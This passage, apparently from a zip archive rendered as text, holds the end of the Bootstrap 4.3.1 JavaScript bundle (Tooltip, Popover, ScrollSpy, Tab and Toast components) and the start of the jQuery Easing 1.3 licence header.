      var titleType = typeof this.element.getAttribute('data-original-title');

      if (this.element.getAttribute('title') || titleType !== 'string') {
        this.element.setAttribute('data-original-title', this.element.getAttribute('title') || '');
        this.element.setAttribute('title', '');
      }
    };

    _proto._enter = function _enter(event, context) {
      var dataKey = this.constructor.DATA_KEY;
      context = context || $(event.currentTarget).data(dataKey);

      if (!context) {
        context = new this.constructor(event.currentTarget, this._getDelegateConfig());
        $(event.currentTarget).data(dataKey, context);
      }

      if (event) {
        context._activeTrigger[event.type === 'focusin' ? Trigger.FOCUS : Trigger.HOVER] = true;
      }

      if ($(context.getTipElement()).hasClass(ClassName$6.SHOW) || context._hoverState === HoverState.SHOW) {
        context._hoverState = HoverState.SHOW;
        return;
      }

      clearTimeout(context._timeout);
      context._hoverState = HoverState.SHOW;

      if (!context.config.delay || !context.config.delay.show) {
        context.show();
        return;
      }

      context._timeout = setTimeout(function () {
        if (context._hoverState === HoverState.SHOW) {
          context.show();
        }
      }, context.config.delay.show);
    };

    _proto._leave = function _leave(event, context) {
      var dataKey = this.constructor.DATA_KEY;
      context = context || $(event.currentTarget).data(dataKey);

      if (!context) {
        context = new this.constructor(event.currentTarget, this._getDelegateConfig());
        $(event.currentTarget).data(dataKey, context);
      }

      if (event) {
        context._activeTrigger[event.type === 'focusout' ? Trigger.FOCUS : Trigger.HOVER] = false;
      }

      if (context._isWithActiveTrigger()) {
        return;
      }

      clearTimeout(context._timeout);
      context._hoverState = HoverState.OUT;

      if (!context.config.delay || !context.config.delay.hide) {
        context.hide();
        return;
      }

      context._timeout = setTimeout(function () {
        if (context._hoverState === HoverState.OUT) {
          context.hide();
        }
      }, context.config.delay.hide);
    };

    _proto._isWithActiveTrigger = function _isWithActiveTrigger() {
      for (var trigger in this._activeTrigger) {
        if (this._activeTrigger[trigger]) {
          return true;
        }
      }

      return false;
    };

    _proto._getConfig = function _getConfig(config) {
      var dataAttributes = $(this.element).data();
      Object.keys(dataAttributes).forEach(function (dataAttr) {
        if (DISALLOWED_ATTRIBUTES.indexOf(dataAttr) !== -1) {
          delete dataAttributes[dataAttr];
        }
      });
      config = _objectSpread({}, this.constructor.Default, dataAttributes, typeof config === 'object' && config ? config : {});

      if (typeof config.delay === 'number') {
        config.delay = {
          show: config.delay,
          hide: config.delay
        };
      }

      if (typeof config.title === 'number') {
        config.title = config.title.toString();
      }

      if (typeof config.content === 'number') {
        config.content = config.content.toString();
      }

      Util.typeCheckConfig(NAME$6, config, this.constructor.DefaultType);

      if (config.sanitize) {
        config.template = sanitizeHtml(config.template, config.whiteList, config.sanitizeFn);
      }

      return config;
    };

    _proto._getDelegateConfig = function _getDelegateConfig() {
      var config = {};

      if (this.config) {
        for (var key in this.config) {
          if (this.constructor.Default[key] !== this.config[key]) {
            config[key] = this.config[key];
          }
        }
      }

      return config;
    };

    _proto._cleanTipClass = function _cleanTipClass() {
      var $tip = $(this.getTipElement());
      var tabClass = $tip.attr('class').match(BSCLS_PREFIX_REGEX);

      if (tabClass !== null && tabClass.length) {
        $tip.removeClass(tabClass.join(''));
      }
    };

    _proto._handlePopperPlacementChange = function _handlePopperPlacementChange(popperData) {
      var popperInstance = popperData.instance;
      this.tip = popperInstance.popper;

      this._cleanTipClass();

      this.addAttachmentClass(this._getAttachment(popperData.placement));
    };

    _proto._fixTransition = function _fixTransition() {
      var tip = this.getTipElement();
      var initConfigAnimation = this.config.animation;

      if (tip.getAttribute('x-placement') !== null) {
        return;
      }

      $(tip).removeClass(ClassName$6.FADE);
      this.config.animation = false;
      this.hide();
      this.show();
      this.config.animation = initConfigAnimation;
    } // Static
    ;

    Tooltip._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$6);

        var _config = typeof config === 'object' && config;

        if (!data && /dispose|hide/.test(config)) {
          return;
        }

        if (!data) {
          data = new Tooltip(this, _config);
          $(this).data(DATA_KEY$6, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config]();
        }
      });
    };

    _createClass(Tooltip, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$6;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$4;
      }
    }, {
      key: "NAME",
      get: function get() {
        return NAME$6;
      }
    }, {
      key: "DATA_KEY",
      get: function get() {
        return DATA_KEY$6;
      }
    }, {
      key: "Event",
      get: function get() {
        return Event$6;
      }
    }, {
      key: "EVENT_KEY",
      get: function get() {
        return EVENT_KEY$6;
      }
    }, {
      key: "DefaultType",
      get: function get() {
        return DefaultType$4;
      }
    }]);

    return Tooltip;
  }();
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */


  $.fn[NAME$6] = Tooltip._jQueryInterface;
  $.fn[NAME$6].Constructor = Tooltip;

  $.fn[NAME$6].noConflict = function () {
    $.fn[NAME$6] = JQUERY_NO_CONFLICT$6;
    return Tooltip._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$7 = 'popover';
  var VERSION$7 = '4.3.1';
  var DATA_KEY$7 = 'bs.popover';
  var EVENT_KEY$7 = "." + DATA_KEY$7;
  var JQUERY_NO_CONFLICT$7 = $.fn[NAME$7];
  var CLASS_PREFIX$1 = 'bs-popover';
  var BSCLS_PREFIX_REGEX$1 = new RegExp("(^|\\s)" + CLASS_PREFIX$1 + "\\S+", 'g');

  var Default$5 = _objectSpread({}, Tooltip.Default, {
    placement: 'right',
    trigger: 'click',
    content: '',
    template: '<div class="popover" role="tooltip">' + '<div class="arrow"></div>' + '<h3 class="popover-header"></h3>' + '<div class="popover-body"></div></div>'
  });

  var DefaultType$5 = _objectSpread({}, Tooltip.DefaultType, {
    content: '(string|element|function)'
  });

  var ClassName$7 = {
    FADE: 'fade',
    SHOW: 'show'
  };
  var Selector$7 = {
    TITLE: '.popover-header',
    CONTENT: '.popover-body'
  };
  var Event$7 = {
    HIDE: "hide" + EVENT_KEY$7,
    HIDDEN: "hidden" + EVENT_KEY$7,
    SHOW: "show" + EVENT_KEY$7,
    SHOWN: "shown" + EVENT_KEY$7,
    INSERTED: "inserted" + EVENT_KEY$7,
    CLICK: "click" + EVENT_KEY$7,
    FOCUSIN: "focusin" + EVENT_KEY$7,
    FOCUSOUT: "focusout" + EVENT_KEY$7,
    MOUSEENTER: "mouseenter" + EVENT_KEY$7,
    MOUSELEAVE: "mouseleave" + EVENT_KEY$7
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Popover =
  /*#__PURE__*/
  function (_Tooltip) {
    _inheritsLoose(Popover, _Tooltip);

    function Popover() {
      return _Tooltip.apply(this, arguments) || this;
    }

    var _proto = Popover.prototype;

    // Overrides
    _proto.isWithContent = function isWithContent() {
      return this.getTitle() || this._getContent();
    };

    _proto.addAttachmentClass = function addAttachmentClass(attachment) {
      $(this.getTipElement()).addClass(CLASS_PREFIX$1 + "-" + attachment);
    };

    _proto.getTipElement = function getTipElement() {
      this.tip = this.tip || $(this.config.template)[0];
      return this.tip;
    };

    _proto.setContent = function setContent() {
      var $tip = $(this.getTipElement()); // We use append for html objects to maintain js events

      this.setElementContent($tip.find(Selector$7.TITLE), this.getTitle());

      var content = this._getContent();

      if (typeof content === 'function') {
        content = content.call(this.element);
      }

      this.setElementContent($tip.find(Selector$7.CONTENT), content);
      $tip.removeClass(ClassName$7.FADE + " " + ClassName$7.SHOW);
    } // Private
    ;

    _proto._getContent = function _getContent() {
      return this.element.getAttribute('data-content') || this.config.content;
    };

    _proto._cleanTipClass = function _cleanTipClass() {
      var $tip = $(this.getTipElement());
      var tabClass = $tip.attr('class').match(BSCLS_PREFIX_REGEX$1);

      if (tabClass !== null && tabClass.length > 0) {
        $tip.removeClass(tabClass.join(''));
      }
    } // Static
    ;

    Popover._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$7);

        var _config = typeof config === 'object' ? config : null;

        if (!data && /dispose|hide/.test(config)) {
          return;
        }

        if (!data) {
          data = new Popover(this, _config);
          $(this).data(DATA_KEY$7, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config]();
        }
      });
    };

    _createClass(Popover, null, [{
      key: "VERSION",
      // Getters
      get: function get() {
        return VERSION$7;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$5;
      }
    }, {
      key: "NAME",
      get: function get() {
        return NAME$7;
      }
    }, {
      key: "DATA_KEY",
      get: function get() {
        return DATA_KEY$7;
      }
    }, {
      key: "Event",
      get: function get() {
        return Event$7;
      }
    }, {
      key: "EVENT_KEY",
      get: function get() {
        return EVENT_KEY$7;
      }
    }, {
      key: "DefaultType",
      get: function get() {
        return DefaultType$5;
      }
    }]);

    return Popover;
  }(Tooltip);
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */


  $.fn[NAME$7] = Popover._jQueryInterface;
  $.fn[NAME$7].Constructor = Popover;

  $.fn[NAME$7].noConflict = function () {
    $.fn[NAME$7] = JQUERY_NO_CONFLICT$7;
    return Popover._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$8 = 'scrollspy';
  var VERSION$8 = '4.3.1';
  var DATA_KEY$8 = 'bs.scrollspy';
  var EVENT_KEY$8 = "." + DATA_KEY$8;
  var DATA_API_KEY$6 = '.data-api';
  var JQUERY_NO_CONFLICT$8 = $.fn[NAME$8];
  var Default$6 = {
    offset: 10,
    method: 'auto',
    target: ''
  };
  var DefaultType$6 = {
    offset: 'number',
    method: 'string',
    target: '(string|element)'
  };
  var Event$8 = {
    ACTIVATE: "activate" + EVENT_KEY$8,
    SCROLL: "scroll" + EVENT_KEY$8,
    LOAD_DATA_API: "load" + EVENT_KEY$8 + DATA_API_KEY$6
  };
  var ClassName$8 = {
    DROPDOWN_ITEM: 'dropdown-item',
    DROPDOWN_MENU: 'dropdown-menu',
    ACTIVE: 'active'
  };
  var Selector$8 = {
    DATA_SPY: '[data-spy="scroll"]',
    ACTIVE: '.active',
    NAV_LIST_GROUP: '.nav, .list-group',
    NAV_LINKS: '.nav-link',
    NAV_ITEMS: '.nav-item',
    LIST_ITEMS: '.list-group-item',
    DROPDOWN: '.dropdown',
    DROPDOWN_ITEMS: '.dropdown-item',
    DROPDOWN_TOGGLE: '.dropdown-toggle'
  };
  var OffsetMethod = {
    OFFSET: 'offset',
    POSITION: 'position'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var ScrollSpy =
  /*#__PURE__*/
  function () {
    function ScrollSpy(element, config) {
      var _this = this;

      this._element = element;
      this._scrollElement = element.tagName === 'BODY' ? window : element;
      this._config = this._getConfig(config);
      this._selector = this._config.target + " " + Selector$8.NAV_LINKS + "," + (this._config.target + " " + Selector$8.LIST_ITEMS + ",") + (this._config.target + " " + Selector$8.DROPDOWN_ITEMS);
      this._offsets = [];
      this._targets = [];
      this._activeTarget = null;
      this._scrollHeight = 0;
      $(this._scrollElement).on(Event$8.SCROLL, function (event) {
        return _this._process(event);
      });
      this.refresh();

      this._process();
    } // Getters


    var _proto = ScrollSpy.prototype;

    // Public
    _proto.refresh = function refresh() {
      var _this2 = this;

      var autoMethod = this._scrollElement === this._scrollElement.window ? OffsetMethod.OFFSET : OffsetMethod.POSITION;
      var offsetMethod = this._config.method === 'auto' ? autoMethod : this._config.method;
      var offsetBase = offsetMethod === OffsetMethod.POSITION ? this._getScrollTop() : 0;
      this._offsets = [];
      this._targets = [];
      this._scrollHeight = this._getScrollHeight();
      var targets = [].slice.call(document.querySelectorAll(this._selector));
      targets.map(function (element) {
        var target;
        var targetSelector = Util.getSelectorFromElement(element);

        if (targetSelector) {
          target = document.querySelector(targetSelector);
        }

        if (target) {
          var targetBCR = target.getBoundingClientRect();

          if (targetBCR.width || targetBCR.height) {
            // TODO (fat): remove sketch reliance on jQuery position/offset
            return [$(target)[offsetMethod]().top + offsetBase, targetSelector];
          }
        }

        return null;
      }).filter(function (item) {
        return item;
      }).sort(function (a, b) {
        return a[0] - b[0];
      }).forEach(function (item) {
        _this2._offsets.push(item[0]);

        _this2._targets.push(item[1]);
      });
    };

    _proto.dispose = function dispose() {
      $.removeData(this._element, DATA_KEY$8);
      $(this._scrollElement).off(EVENT_KEY$8);
      this._element = null;
      this._scrollElement = null;
      this._config = null;
      this._selector = null;
      this._offsets = null;
      this._targets = null;
      this._activeTarget = null;
      this._scrollHeight = null;
    } // Private
    ;

    _proto._getConfig = function _getConfig(config) {
      config = _objectSpread({}, Default$6, typeof config === 'object' && config ? config : {});

      if (typeof config.target !== 'string') {
        var id = $(config.target).attr('id');

        if (!id) {
          id = Util.getUID(NAME$8);
          $(config.target).attr('id', id);
        }

        config.target = "#" + id;
      }

      Util.typeCheckConfig(NAME$8, config, DefaultType$6);
      return config;
    };

    _proto._getScrollTop = function _getScrollTop() {
      return this._scrollElement === window ? this._scrollElement.pageYOffset : this._scrollElement.scrollTop;
    };

    _proto._getScrollHeight = function _getScrollHeight() {
      return this._scrollElement.scrollHeight || Math.max(document.body.scrollHeight, document.documentElement.scrollHeight);
    };

    _proto._getOffsetHeight = function _getOffsetHeight() {
      return this._scrollElement === window ? window.innerHeight : this._scrollElement.getBoundingClientRect().height;
    };

    _proto._process = function _process() {
      var scrollTop = this._getScrollTop() + this._config.offset;

      var scrollHeight = this._getScrollHeight();

      var maxScroll = this._config.offset + scrollHeight - this._getOffsetHeight();

      if (this._scrollHeight !== scrollHeight) {
        this.refresh();
      }

      if (scrollTop >= maxScroll) {
        var target = this._targets[this._targets.length - 1];

        if (this._activeTarget !== target) {
          this._activate(target);
        }

        return;
      }

      if (this._activeTarget && scrollTop < this._offsets[0] && this._offsets[0] > 0) {
        this._activeTarget = null;

        this._clear();

        return;
      }

      var offsetLength = this._offsets.length;

      for (var i = offsetLength; i--;) {
        var isActiveTarget = this._activeTarget !== this._targets[i] && scrollTop >= this._offsets[i] && (typeof this._offsets[i + 1] === 'undefined' || scrollTop < this._offsets[i + 1]);

        if (isActiveTarget) {
          this._activate(this._targets[i]);
        }
      }
    };

    _proto._activate = function _activate(target) {
      this._activeTarget = target;

      this._clear();

      var queries = this._selector.split(',').map(function (selector) {
        return selector + "[data-target=\"" + target + "\"]," + selector + "[href=\"" + target + "\"]";
      });

      var $link = $([].slice.call(document.querySelectorAll(queries.join(','))));

      if ($link.hasClass(ClassName$8.DROPDOWN_ITEM)) {
        $link.closest(Selector$8.DROPDOWN).find(Selector$8.DROPDOWN_TOGGLE).addClass(ClassName$8.ACTIVE);
        $link.addClass(ClassName$8.ACTIVE);
      } else {
        // Set triggered link as active
        $link.addClass(ClassName$8.ACTIVE); // Set triggered links parents as active
        // With both <ul> and <nav> markup a parent is the previous sibling of any nav ancestor

        $link.parents(Selector$8.NAV_LIST_GROUP).prev(Selector$8.NAV_LINKS + ", " + Selector$8.LIST_ITEMS).addClass(ClassName$8.ACTIVE); // Handle special case when .nav-link is inside .nav-item

        $link.parents(Selector$8.NAV_LIST_GROUP).prev(Selector$8.NAV_ITEMS).children(Selector$8.NAV_LINKS).addClass(ClassName$8.ACTIVE);
      }

      $(this._scrollElement).trigger(Event$8.ACTIVATE, {
        relatedTarget: target
      });
    };

    _proto._clear = function _clear() {
      [].slice.call(document.querySelectorAll(this._selector)).filter(function (node) {
        return node.classList.contains(ClassName$8.ACTIVE);
      }).forEach(function (node) {
        return node.classList.remove(ClassName$8.ACTIVE);
      });
    } // Static
    ;

    ScrollSpy._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$8);

        var _config = typeof config === 'object' && config;

        if (!data) {
          data = new ScrollSpy(this, _config);
          $(this).data(DATA_KEY$8, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config]();
        }
      });
    };

    _createClass(ScrollSpy, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$8;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$6;
      }
    }]);

    return ScrollSpy;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(window).on(Event$8.LOAD_DATA_API, function () {
    var scrollSpys = [].slice.call(document.querySelectorAll(Selector$8.DATA_SPY));
    var scrollSpysLength = scrollSpys.length;

    for (var i = scrollSpysLength; i--;) {
      var $spy = $(scrollSpys[i]);

      ScrollSpy._jQueryInterface.call($spy, $spy.data());
    }
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$8] = ScrollSpy._jQueryInterface;
  $.fn[NAME$8].Constructor = ScrollSpy;

  $.fn[NAME$8].noConflict = function () {
    $.fn[NAME$8] = JQUERY_NO_CONFLICT$8;
    return ScrollSpy._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$9 = 'tab';
  var VERSION$9 = '4.3.1';
  var DATA_KEY$9 = 'bs.tab';
  var EVENT_KEY$9 = "." + DATA_KEY$9;
  var DATA_API_KEY$7 = '.data-api';
  var JQUERY_NO_CONFLICT$9 = $.fn[NAME$9];
  var Event$9 = {
    HIDE: "hide" + EVENT_KEY$9,
    HIDDEN: "hidden" + EVENT_KEY$9,
    SHOW: "show" + EVENT_KEY$9,
    SHOWN: "shown" + EVENT_KEY$9,
    CLICK_DATA_API: "click" + EVENT_KEY$9 + DATA_API_KEY$7
  };
  var ClassName$9 = {
    DROPDOWN_MENU: 'dropdown-menu',
    ACTIVE: 'active',
    DISABLED: 'disabled',
    FADE: 'fade',
    SHOW: 'show'
  };
  var Selector$9 = {
    DROPDOWN: '.dropdown',
    NAV_LIST_GROUP: '.nav, .list-group',
    ACTIVE: '.active',
    ACTIVE_UL: '> li > .active',
    DATA_TOGGLE: '[data-toggle="tab"], [data-toggle="pill"], [data-toggle="list"]',
    DROPDOWN_TOGGLE: '.dropdown-toggle',
    DROPDOWN_ACTIVE_CHILD: '> .dropdown-menu .active'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Tab =
  /*#__PURE__*/
  function () {
    function Tab(element) {
      this._element = element;
    } // Getters


    var _proto = Tab.prototype;

    // Public
    _proto.show = function show() {
      var _this = this;

      if (this._element.parentNode && this._element.parentNode.nodeType === Node.ELEMENT_NODE && $(this._element).hasClass(ClassName$9.ACTIVE) || $(this._element).hasClass(ClassName$9.DISABLED)) {
        return;
      }

      var target;
      var previous;
      var listElement = $(this._element).closest(Selector$9.NAV_LIST_GROUP)[0];
      var selector = Util.getSelectorFromElement(this._element);

      if (listElement) {
        var itemSelector = listElement.nodeName === 'UL' || listElement.nodeName === 'OL' ? Selector$9.ACTIVE_UL : Selector$9.ACTIVE;
        previous = $.makeArray($(listElement).find(itemSelector));
        previous = previous[previous.length - 1];
      }

      var hideEvent = $.Event(Event$9.HIDE, {
        relatedTarget: this._element
      });
      var showEvent = $.Event(Event$9.SHOW, {
        relatedTarget: previous
      });

      if (previous) {
        $(previous).trigger(hideEvent);
      }

      $(this._element).trigger(showEvent);

      if (showEvent.isDefaultPrevented() || hideEvent.isDefaultPrevented()) {
        return;
      }

      if (selector) {
        target = document.querySelector(selector);
      }

      this._activate(this._element, listElement);

      var complete = function complete() {
        var hiddenEvent = $.Event(Event$9.HIDDEN, {
          relatedTarget: _this._element
        });
        var shownEvent = $.Event(Event$9.SHOWN, {
          relatedTarget: previous
        });
        $(previous).trigger(hiddenEvent);
        $(_this._element).trigger(shownEvent);
      };

      if (target) {
        this._activate(target, target.parentNode, complete);
      } else {
        complete();
      }
    };

    _proto.dispose = function dispose() {
      $.removeData(this._element, DATA_KEY$9);
      this._element = null;
    } // Private
    ;

    _proto._activate = function _activate(element, container, callback) {
      var _this2 = this;

      var activeElements = container && (container.nodeName === 'UL' || container.nodeName === 'OL') ? $(container).find(Selector$9.ACTIVE_UL) : $(container).children(Selector$9.ACTIVE);
      var active = activeElements[0];
      var isTransitioning = callback && active && $(active).hasClass(ClassName$9.FADE);

      var complete = function complete() {
        return _this2._transitionComplete(element, active, callback);
      };

      if (active && isTransitioning) {
        var transitionDuration = Util.getTransitionDurationFromElement(active);
        $(active).removeClass(ClassName$9.SHOW).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
      } else {
        complete();
      }
    };

    _proto._transitionComplete = function _transitionComplete(element, active, callback) {
      if (active) {
        $(active).removeClass(ClassName$9.ACTIVE);
        var dropdownChild = $(active.parentNode).find(Selector$9.DROPDOWN_ACTIVE_CHILD)[0];

        if (dropdownChild) {
          $(dropdownChild).removeClass(ClassName$9.ACTIVE);
        }

        if (active.getAttribute('role') === 'tab') {
          active.setAttribute('aria-selected', false);
        }
      }

      $(element).addClass(ClassName$9.ACTIVE);

      if (element.getAttribute('role') === 'tab') {
        element.setAttribute('aria-selected', true);
      }

      Util.reflow(element);

      if (element.classList.contains(ClassName$9.FADE)) {
        element.classList.add(ClassName$9.SHOW);
      }

      if (element.parentNode && $(element.parentNode).hasClass(ClassName$9.DROPDOWN_MENU)) {
        var dropdownElement = $(element).closest(Selector$9.DROPDOWN)[0];

        if (dropdownElement) {
          var dropdownToggleList = [].slice.call(dropdownElement.querySelectorAll(Selector$9.DROPDOWN_TOGGLE));
          $(dropdownToggleList).addClass(ClassName$9.ACTIVE);
        }

        element.setAttribute('aria-expanded', true);
      }

      if (callback) {
        callback();
      }
    } // Static
    ;

    Tab._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var $this = $(this);
        var data = $this.data(DATA_KEY$9);

        if (!data) {
          data = new Tab(this);
          $this.data(DATA_KEY$9, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config]();
        }
      });
    };

    _createClass(Tab, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$9;
      }
    }]);

    return Tab;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(document).on(Event$9.CLICK_DATA_API, Selector$9.DATA_TOGGLE, function (event) {
    event.preventDefault();

    Tab._jQueryInterface.call($(this), 'show');
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$9] = Tab._jQueryInterface;
  $.fn[NAME$9].Constructor = Tab;

  $.fn[NAME$9].noConflict = function () {
    $.fn[NAME$9] = JQUERY_NO_CONFLICT$9;
    return Tab._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$a = 'toast';
  var VERSION$a = '4.3.1';
  var DATA_KEY$a = 'bs.toast';
  var EVENT_KEY$a = "." + DATA_KEY$a;
  var JQUERY_NO_CONFLICT$a = $.fn[NAME$a];
  var Event$a = {
    CLICK_DISMISS: "click.dismiss" + EVENT_KEY$a,
    HIDE: "hide" + EVENT_KEY$a,
    HIDDEN: "hidden" + EVENT_KEY$a,
    SHOW: "show" + EVENT_KEY$a,
    SHOWN: "shown" + EVENT_KEY$a
  };
  var ClassName$a = {
    FADE: 'fade',
    HIDE: 'hide',
    SHOW: 'show',
    SHOWING: 'showing'
  };
  var DefaultType$7 = {
    animation: 'boolean',
    autohide: 'boolean',
    delay: 'number'
  };
  var Default$7 = {
    animation: true,
    autohide: true,
    delay: 500
  };
  var Selector$a = {
    DATA_DISMISS: '[data-dismiss="toast"]'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Toast =
  /*#__PURE__*/
  function () {
    function Toast(element, config) {
      this._element = element;
      this._config = this._getConfig(config);
      this._timeout = null;

      this._setListeners();
    } // Getters


    var _proto = Toast.prototype;

    // Public
    _proto.show = function show() {
      var _this = this;

      $(this._element).trigger(Event$a.SHOW);

      if (this._config.animation) {
        this._element.classList.add(ClassName$a.FADE);
      }

      var complete = function complete() {
        _this._element.classList.remove(ClassName$a.SHOWING);

        _this._element.classList.add(ClassName$a.SHOW);

        $(_this._element).trigger(Event$a.SHOWN);

        if (_this._config.autohide) {
          _this.hide();
        }
      };

      this._element.classList.remove(ClassName$a.HIDE);

      this._element.classList.add(ClassName$a.SHOWING);

      if (this._config.animation) {
        var transitionDuration = Util.getTransitionDurationFromElement(this._element);
        $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
      } else {
        complete();
      }
    };

    _proto.hide = function hide(withoutTimeout) {
      var _this2 = this;

      if (!this._element.classList.contains(ClassName$a.SHOW)) {
        return;
      }

      $(this._element).trigger(Event$a.HIDE);

      if (withoutTimeout) {
        this._close();
      } else {
        this._timeout = setTimeout(function () {
          _this2._close();
        }, this._config.delay);
      }
    };

    _proto.dispose = function dispose() {
      clearTimeout(this._timeout);
      this._timeout = null;

      if (this._element.classList.contains(ClassName$a.SHOW)) {
        this._element.classList.remove(ClassName$a.SHOW);
      }

      $(this._element).off(Event$a.CLICK_DISMISS);
      $.removeData(this._element, DATA_KEY$a);
      this._element = null;
      this._config = null;
    } // Private
    ;

    _proto._getConfig = function _getConfig(config) {
      config = _objectSpread({}, Default$7, $(this._element).data(), typeof config === 'object' && config ? config : {});
      Util.typeCheckConfig(NAME$a, config, this.constructor.DefaultType);
      return config;
    };

    _proto._setListeners = function _setListeners() {
      var _this3 = this;

      $(this._element).on(Event$a.CLICK_DISMISS, Selector$a.DATA_DISMISS, function () {
        return _this3.hide(true);
      });
    };

    _proto._close = function _close() {
      var _this4 = this;

      var complete = function complete() {
        _this4._element.classList.add(ClassName$a.HIDE);

        $(_this4._element).trigger(Event$a.HIDDEN);
      };

      this._element.classList.remove(ClassName$a.SHOW);

      if (this._config.animation) {
        var transitionDuration = Util.getTransitionDurationFromElement(this._element);
        $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
      } else {
        complete();
      }
    } // Static
    ;

    Toast._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var $element = $(this);
        var data = $element.data(DATA_KEY$a);

        var _config = typeof config === 'object' && config;

        if (!data) {
          data = new Toast(this, _config);
          $element.data(DATA_KEY$a, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config](this);
        }
      });
    };

    _createClass(Toast, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$a;
      }
    }, {
      key: "DefaultType",
      get: function get() {
        return DefaultType$7;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$7;
      }
    }]);

    return Toast;
  }();
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */


  $.fn[NAME$a] = Toast._jQueryInterface;
  $.fn[NAME$a].Constructor = Toast;

  $.fn[NAME$a].noConflict = function () {
    $.fn[NAME$a] = JQUERY_NO_CONFLICT$a;
    return Toast._jQueryInterface;
  };

  /**
   * --------------------------------------------------------------------------
   * Bootstrap (v4.3.1): index.js
   * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
   * --------------------------------------------------------------------------
   */

  (function () {
    if (typeof $ === 'undefined') {
      throw new TypeError('Bootstrap\'s JavaScript requires jQuery. jQuery must be included before Bootstrap\'s JavaScript.');
    }

    var version = $.fn.jquery.split(' ')[0].split('.');
    var minMajor = 1;
    var ltMajor = 2;
    var minMinor = 9;
    var minPatch = 1;
    var maxMajor = 4;

    if (version[0] < ltMajor && version[1] < minMinor || version[0] === minMajor && version[1] === minMinor && version[2] < minPatch || version[0] >= maxMajor) {
      throw new Error('Bootstrap\'s JavaScript requires at least jQuery v1.9.1 but less than v4.0.0');
    }
  })();

  exports.Util = Util;
  exports.Alert = Alert;
  exports.Button = Button;
  exports.Carousel = Carousel;
  exports.Collapse = Collapse;
  exports.Dropdown = Dropdown;
  exports.Modal = Modal;
  exports.Popover = Popover;
  exports.Scrollspy = ScrollSpy;
  exports.Tab = Tab;
  exports.Toast = Toast;
  exports.Tooltip = Tooltip;

  Object.defineProperty(exports, '__esModule', { value: true });

}));
//# sourceMappingURL=bootstrap.js.map
PK!'%1��$�$counterup/jquery.easing.1.3.jsnu&1i�/*
 * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
 *
 * Uses the built in easing capabilities added In jQuery 1.1
 * to offer multiple easing options
 *
 * TERMS OF USE - jQuery Easing
 * 
 * Open source under the BSD License. 
 * 
 * Copyright © 2008 George McGinley Smith
 * All rights reserved.
 
 * Redistribution and use in source and binary forms, with or without modification, 
 * are permitted provided that the following conditions are met:
 * 
 * Redistributions of source code must retain the above copyright notice, this list of 
 * conditions and the following disclaimer.
 * Redistributions in binary form must reproduce the above copyright notice, this list 
 * of conditions and the following disclaimer in the documentation and/or other materials 
 * provided with the distribution.
 * 
 * Neither the name of the author nor the names of contributors may be used to endorse 
 * or promote products derived from this software without specific prior written permission.
 * 
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY 
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 *  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
